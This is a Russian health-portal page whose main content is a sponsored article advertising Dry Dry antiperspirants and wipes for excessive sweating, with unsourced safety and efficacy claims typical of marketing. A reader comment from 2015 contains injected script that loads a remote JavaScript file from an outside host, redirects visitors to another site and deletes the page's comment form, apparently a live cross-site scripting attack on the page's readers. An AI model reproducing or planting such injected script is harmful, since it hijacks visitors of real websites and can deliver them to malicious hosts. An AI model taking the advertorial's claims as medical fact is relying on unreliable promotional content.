Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Причина неприятного запах...  >>  Причина неприятного запаха под контролем
 
Обратная связь
 

Причина неприятного запаха под контролем

Размер шрифта
10 декабря 2012 17:14
  • google_analytics: false
  • Нравится

Совсем скоро настанет время волшебства и подарков, ярких впечатлений, встреч, настанет время чудес! Новый Год – праздник, любимый с детства.

Dry Dry

Так хочется, чтобы ничего не омрачало самый долгожданный вечер в году! А сколько всего нужно сделать, чтобы превратить праздник в сказку. И как грустно думать, что, казалось бы, естественные физиологические процессы организма могут свести на «нет» все приготовления!

«Что естественно, то не безобразно», – эту фразу мы слышали много раз и сами нередко произносили. Выделение пота вроде тоже естественный процесс, но чувства вызывает противоречивые. Если в бане или тренажерном зале на усиленное потоотделение никто и внимания не обратит, то в другой обстановке незамеченным это не останется. Мокрые круги на одежде с характерным запахом, не только не добавляют облику привлекательности, но и могут испортить самое благоприятное впечатление о человеке. Для некоторых это становится едва ли не самой главной проблемой в жизни.

Проблема гипергидроза
Выделение пота помогает предотвратить перегрев организма. Помимо функции охлаждения, он выводит из организма лишние соли и токсины. Поэтому время от времени хорошенько пропотеть полезно. Но у некоторых людей потовые железы, независимо от внешних условий, активно выделяют влагу. Мокрые ладони, ступни и подмышки, спина, шея, а то и все тело – согласитесь, это не очень приятно. Пятна от пота на одежде придают облику неопрятный вид и производят на окружающих отталкивающее впечатление. Во влажной среде начинают размножаться бактерии, в результате деятельности которых возникает неприятный запах. Существование в условиях постоянной «повышенной влажности» вынуждает отказываться от многих радостей жизни, создает препятствие для карьерного роста и мешает личной жизни. И средства, обещающие защиту от пота на 24 часа, в случае с гипергидрозом часто оказываются бессильными. Дезодоранты лишь маскируют запах пота, никак не влияя на его количество, антиперспиранты по большей части не в состоянии справиться с обильным потом, к тому же на ладони и стопы их не нанесешь.

Решение проблемы

Специально для людей, страдающих от гипергидроза, шведской компанией «Lexima AB» разработан антиперспирант Dry Dry. Более 30 лет он пользуется популярностью на рынке косметических товаров Швеции и Финляндии, да и российским потребителям уже тоже хорошо знаком.

В составе средства содержится гидрат хлористого алюминия (30,5%), который блокирует выделение пота на обработанных поверхностях кожи. При этом не возникает избыточного потоотделения на других участках тела и функция потовых желез не нарушается. Действие Dry Dry длится долго – до 5-7 дней, а его безопасность подтверждена неоднократными исследованиями, проводившимися в России и других странах.

Новинка

У фирмы Dry Dry есть новое удобное средство. Это – салфетки разового применения в индивидуальной упаковке, которые удобно брать с собой в дорогу, путешествие и т.д. Каждая салфетка пропитана средством Dry Dry и помещена в герметичную индивидуальную упаковку, она легко поместится в кармане пиджака, дамской сумочке или чемодане. Следует помнить, что использовать салфетку необходимо строго по инструкции! А у тех, кто пока еще не пользовался Dry Dry, но всегда хотел, появилась возможность попробовать и убедиться в его высокой эффективности. Для этого достаточно купить всего лишь 1 салфетку.

Dry Dry

На эффективность форма выпуска никак не повлияла. Салфетки Dry Dry спасают от чрезмерного выделения пота на 5-7 дней, достаточно использовать их 1-2 раза в неделю или по необходимости. Средство не оставляет следов на одежде и не обладает резким косметическим запахом. При правильном применении средство хорошо переносится и не вызывает раздражения. Причиной возникновения жжения и покраснения на коже является, как правило, недостаточно хорошо высушенная кожа перед применением. В таком случае средство следует смыть водой и повторно нанести  не ранее, чем через 24 часа.

Для людей с чувствительной кожей

Для обладателей чувствительной кожи подойдет Dry Dry Sensitive – средство от повышенного и нормального потоотделения на водной основе. Средство специально выполнено без парфюмированых отдушек, что позволяет использовать его как мужчинам, так и женщинам. Да и аромат любимых духов не будет заглушен посторонними запахами!

 В ближайшей перспективе вниманию потребителей будут предложены два новых средства: это Dry Dry Light и Dry Dry Gel.

Dry Dry Light заинтересует тех, кто ищет компромисс между классическим  Dry Dry и мягким Dry Dry Sensitive.

Dry Dry Gel, содержащий алоэ вера и зеленый чай, предназначен для ухода за поврежденной кожей а так же в тех случаях, когда недостаточно свойств привычного крема.

В любом случае, какое бы из средств Dry Dry Вы не выбрали, Вы всегда будете ощущать спокойствие за свой внешний вид и наслаждаться жизнью во всех ее проявлениях! В праздники и не только!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
От вас дурно пахнет. Как избавиться от запахов тела   Почему у вас воняют ноги? Как с этим бороться   Как не потеть   От меня воняет! Как избавиться от запахов  

Слайдшоу

1
Как остаться сухой, и не вспотеть
Самые стыдные вопросы о красоте. Часть 2
Постоянно потеете? Как жить дальше?

Тесты

Есть ли у вас гормональные нарушения
Как облегчить менопаузу?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.